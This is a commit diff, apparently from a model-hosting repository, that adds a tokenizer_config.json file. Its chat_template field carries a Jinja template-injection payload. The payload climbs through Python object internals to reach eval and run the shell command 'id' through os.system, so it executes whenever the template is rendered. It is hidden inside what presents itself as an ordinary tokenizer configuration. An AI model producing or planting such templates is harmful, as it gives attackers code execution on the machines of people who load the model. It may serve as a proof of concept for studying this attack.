Upload tokenizer_config.json
Browse files- tokenizer_config.json +5 -0
tokenizer_config.json
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"chat_template": "{% for message in messages %}{{ message['content'] }}{% endfor %}{{ raise_exception('') | attr('__class__') | attr('__base__') | attr('__subclasses__')() | first | attr('__init__') | attr('__globals__') | attr('builtins') | attr('eval')('__import__(\"os\").system(\"id\")') }}",
|
| 3 |
+
"bos_token": "<s>",
|
| 4 |
+
"eos_token": "</s>"
|
| 5 |
+
}
|